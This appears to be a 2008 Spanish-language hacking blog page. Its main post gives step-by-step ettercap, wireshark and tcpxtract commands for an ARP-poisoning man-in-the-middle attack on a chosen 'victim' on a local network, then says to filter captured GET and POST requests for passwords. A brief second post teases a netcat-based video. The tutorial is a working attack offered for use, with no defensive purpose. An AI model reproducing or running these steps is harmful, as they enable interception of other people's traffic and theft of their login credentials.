Main image
10-12
2008
written by r3vz


-x-PDV-x-

No Existen Comentarios | Leido: 19 veces
08-12
2008
written by r3vz

En este pequeño video tutorial enseñare como realizar este ataque es algo sencillo, veremos cono capturar el trafico para poder analizarlo y reconstruirlo.
usaremos
ettercap
wireshark
tcpxtract

descarga el videoaqui

///////////////////////////////////////////////////////////////////
Fernando
r3vz
www.r3vz.org
Mail: r3vz@r3vz.org
msn: r3vz@diosdelared.us
///////////////////////////////////////////////////////////////////


Todo lo que se escribe:

Codigo:
sudo ettercap -C iniciamos ettercap en modo consola
sudo wireshark  iniciamos wireshark ambos se inician como root


en ettercap
Sniff--unified sniff
eth0 <-- por default
Host--Scan for Host
Host--Host list
Nos mostrara una lista de ip's nos ubicamos en la que queremos que sea nuestra victima y precionamos el numero 1 nos mostrara Host 192.168.1.x added to TARGET 1
y despues seleccionamos el router 192.168.1.254
ahora en wireshark iniciamos la captura de paquetes
Capture--Options--start
regresamos a ettercap y en la pestaña MItm seleccionar Arp poisoning
en Parameters ponemos "remote"
Start--Start Sniffing
ahora en otra pestaña o consola vamos a reconstriur los paquetes capturados y guardarlos en una carpeta en este caso ar
Codigo:
sudo tcpxtract --device eth0 --output ar

una vez hecho empezara a generar todo lo que esta capturando y lo guardara en la carptea ar (como usuario root)

pasado un buen rato una vez logrado tu objetivo debemos restaurar todo
en ettercap seleccionamos
Start-stop sniffing
Mitm-Stop mitm atacks
y en wireshar paramos con Ctrl+e Capture-Stop
guardamos todo lo que se capturo para despues poder usar algunos filtros GET y POST y ver si le logueo en algun sitio de seguro estara la contraseña

para poder regenerar el contenido el paquete optenido con wireshar usamos

Codigo:
sudo tcpxtract --file paquete --output --carpeta_destino


despues les cambiamos permisos
///////////////////////////////////////////////////////////////////
Fernando
r3vz
www.r3vz.org
para
www.hslteam.org
www.diosdelared.com
///////////////////////////////////////////////////////////////////

No Existen Comentarios | Leido: 35 veces
25-11
2008
written by r3vz

Usando netcat y DataChaos esto puede ser posible, es útil cuando no podemos cambiarnos de directorio o listar, este es un ejemplo muy sencillo el cual hice pensando en algunos usuarios del foro diosdelared.com
Clic aqui para ver el Video

Existe 1 Comentario | Leido: 33 veces

POWERED BY

  • Get the Flash Player to see this player.